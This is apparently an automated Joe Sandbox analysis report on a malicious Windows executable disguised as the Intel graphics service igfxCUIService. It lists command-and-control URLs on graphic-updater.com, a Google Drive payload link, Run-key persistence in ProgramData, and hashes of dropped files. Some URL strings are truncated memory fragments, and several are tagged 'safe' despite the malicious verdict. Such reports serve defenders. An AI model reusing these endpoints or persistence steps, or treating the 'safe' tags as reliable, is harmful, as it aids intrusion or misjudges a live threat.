              https://graphic-updater.com/api/attachM&dQ%igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/reqs%qPGigfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/comDigfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/reqmjigfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/requrlencodedz%hPFigfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/CigfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/om6igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://graphic-updater.com/api/reqmv1igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.com/igfxCUIService.exe, 00000020.00000002.956121777.0000000001438000.00000004.00000020.sdmpfalse
                		high
                http://crl.microsoft.copowershell.exe, 00000003.00000002.728563333.0000000000650000.00000004.00000040.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpfalse
                  		high
                  https://graphic-updater.com/api/attachn5igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://graphic-updater.com/api/reqchigfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://graphic-updater.com/lligfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://drive.google.com/uc?id=1W64PQQxrwY3XjBnv_QAeBQu-ePr537eumgr32.dlligfxCUIService.exe, 00000020.00000002.956103538.0000000001430000.00000004.00000020.sdmpfalse
                    		high
                    http://crl.micrpowershell.exe, 00000007.00000003.793364315.0000000007F16000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.793470514.0000000007F17000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.729637199.0000000004701000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.819681378.0000000004D91000.00000004.00000001.sdmpfalse
                      		high
                      https://grc-0k-2o-docs.googleusercontent.com/%%doc-0k-2o-docs.googleusercontent.comigfxCUIService.exe, 00000020.00000003.909608039.00000000014A2000.00000004.00000001.sdmpfalse
                        		high
                        https://graphic-updater.com/omXigfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://csp.withgoogle.com/csp/report-to/gse_l9ocaqigfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.730907422.0000000005766000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpfalse
                          		high
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000007.00000002.820903134.0000000005611000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://graphic-updater.com/uigfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://google.com/aigfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000007.00000002.821182632.0000000005DF4000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://graphic-updater.com/api/req2igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919317267.00000000014A2000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://graphic-updater.com/api/req7igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://graphic-updater.com/api/attacht.comigfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://graphic-updater.com/api/req8igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://graphic-updater.comcomVigfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://csp.withgoogle.com/csp/report-to/gse_l9ocg5EhigfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.819829788.0000000004ED3000.00000004.00000001.sdmpfalse
                                		high
                                https://graphic-updater.com/api/attach/igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://google.com/igfxCUIService.exe, 00000020.00000003.909658856.00000000014B8000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmpfalse
                                  		high
                                  https://graphic-updater.com/api/reqCigfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://graphic-updater.com/api/reqm64W%igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://graphic-updater.com/api/reqmxigfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://graphic-updater.com/api/attachtent.comigfxCUIService.exe, 00000024.00000003.936301997.00000000010BC000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000002.956323129.00000000010B5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmp, igfxCUIService.exe, 00000024.00000003.938100085.00000000010B5000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://graphic-updater.com_igfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.929481802.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.926733097.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.919411998.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  https://graphic-updater.com/api/reqMigfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmpfalse
                                    		unknown
                                    https://graphic-updater.com/PigfxCUIService.exe, 00000020.00000003.936963669.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000002.956485320.00000000014C5000.00000004.00000020.sdmp, igfxCUIService.exe, 00000020.00000003.935010014.00000000014C5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://graphic-updater.com/api/reqOigfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmpfalse
                                      		unknown
                                      https://graphic-updater.com/api/reqdlligfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://graphic-updater.com/QigfxCUIService.exe, 00000020.00000003.932858183.00000000014C5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://graphic-updater.com/api/reqTigfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://graphic-updater.com/XigfxCUIService.exe, 00000020.00000003.913335393.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.913386855.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.915046068.00000000014C6000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.914984347.00000000014C5000.00000004.00000001.sdmp, igfxCUIService.exe, 00000020.00000003.924923494.00000000014C5000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://graphic-updater.com/api/reqWigfxCUIService.exe, 00000024.00000003.936517922.00000000010F8000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://graphic-updater.com/api/reqVigfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://graphic-updater.com/api/reqXigfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://doc-0k-2o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ot3340k8igfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpfalse
                                        		high
                                        https://graphic-updater.comcom5igfxCUIService.exe, 00000005.00000003.911434429.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.909567562.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.895850680.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.918395630.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.923819521.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.884039148.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.900851092.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.889304778.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.925560978.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.936867052.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000002.956460626.000000000122A000.00000004.00000020.sdmp, igfxCUIService.exe, 00000005.00000003.897518797.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.893294803.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.885886436.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.921655046.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.887517216.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.904255016.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.882185270.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.899126538.000000000122A000.00000004.00000001.sdmp, igfxCUIService.exe, 00000005.00000003.891130863.000000000122A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://graphic-updater.comomHigfxCUIService.exe, 00000024.00000003.933876684.00000000010BA000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://graphic-updater.com/api/reqdlliigfxCUIService.exe, 00000005.00000003.907704317.000000000122A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://graphic-updater.com/api/attachent.comigfxCUIService.exe, 00000005.00000003.880367495.000000000122A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.181.238
                                        		drive.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        142.250.185.129
                                        		googlehosted.l.googleusercontent.comUnited States
                                        		15169GOOGLEUSfalse
                                        23.254.131.176
                                        		graphic-updater.comUnited States
                                        		54290HOSTWINDSUSfalse

                                        Private

                                        IP
                                        192.168.2.1

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:550959
                                        Start date:11.01.2022
                                        Start time:17:06:26
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 13m 18s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:IGFXCUISERVICE (renamed file extension from none to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:43
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal92.evad.winEXE@43/21@55/4
                                        EGA Information:
                                        • Successful, ratio: 75%
                                        HDC Information:
                                        • Successful, ratio: 0.1% (good quality ratio 0.1%)
                                        • Quality average: 66.8%
                                        • Quality standard deviation: 19.6%
                                        HCA Information:
                                        • Successful, ratio: 65%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                        • Execution Graph export aborted for target powershell.exe, PID 3160 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:07:27API Interceptor7x Sleep call for process: IGFXCUISERVICE.exe modified
                                        17:07:45API Interceptor75x Sleep call for process: powershell.exe modified
                                        17:07:57API Interceptor124x Sleep call for process: igfxCUIService.exe modified
                                        17:08:30API Interceptor3x Sleep call for process: WMIC.exe modified
                                        17:09:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run igfxCUIService C:\ProgramData\SystemData\igfxCUIService.exe
                                        17:09:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run igfxCUIService C:\ProgramData\SystemData\igfxCUIService.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASN

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\SystemData\igfxCUIService.exe
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):401920
                                        Entropy (8bit):6.560987668019584
                                        Encrypted:false
                                        SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                        MD5:D90D0F4D6DAD402B5D025987030CC87C
                                        SHA1:FAD66BDF5C5DC2C050CBC574832C6995DBA086A0
                                        SHA-256:1FFD6559D21470C40DCF9236DA51E5823D7AD58C93502279871C3FE7718C901C
                                        SHA-512:C2FAEACFD588585633630AD710F443A72C7617C2D5E37DBFE43570E6AC5904E4B81EB682356A48A93BB794EF5E9D8AD0D673966D57798079B4DE62EA61241024
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Metadefender, Detection: 20%, Browse
                                        • Antivirus: ReversingLabs, Detection: 42%
                                        Reputation:unknown
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@......................@...N.......N.....N.........................g.....g.R...g.....Rich............................PE..L...b*1a.............................M............@..........................`............@.....................................x............................ ...8.....................................@............................................text.............................. ..`.rdata...?.......@..................@..@.data....!..........................@....rsrc...............................@..@.reloc...8... ...:..................@..B................................................................................................................................................................................................................................................................................................
                                        C:\ProgramData\SystemData\igfxCUIService.exe:Zone.Identifier
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:unknown
                                        Preview: [ZoneTransfer]....ZoneId=0
                                        C:\ProgramData\SystemData\microsoft_Windows.dll
                                        Process:C:\ProgramData\SystemData\igfxCUIService.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):184
                                        Entropy (8bit):5.819826125590985
                                        Encrypted:false
                                        SSDEEP:3:LwjDqwo0RMYuSQVp9Gr3JlWRYRJKZMUbnAZ1coZqa/ryaRreJquXMUquOU+77Y:sQ0RMY1AQOjZMyAZ1coZqXSAqCVOXg
                                        MD5:754BD9912D528650E1FC25EA78C7DFCE
                                        SHA1:676AB226ED586409D036CC772772BDD868F86CD2
                                        SHA-256:05199B785C99700D96CDE4E5FBDD033ACC79AB42C29C283E86FBEE8B7CB2FA09
                                        SHA-512:564899F4FD9E71F2BF95F71EC744FA0BB63BEC4C74F59FF82E5985C0138FE21399EFD76B2C55DF215E65C87FA23B20E5FA021C99CCDD78BEF7BD0F6E3FFA684C
                                        Malicious:false
                                        Reputation:unknown
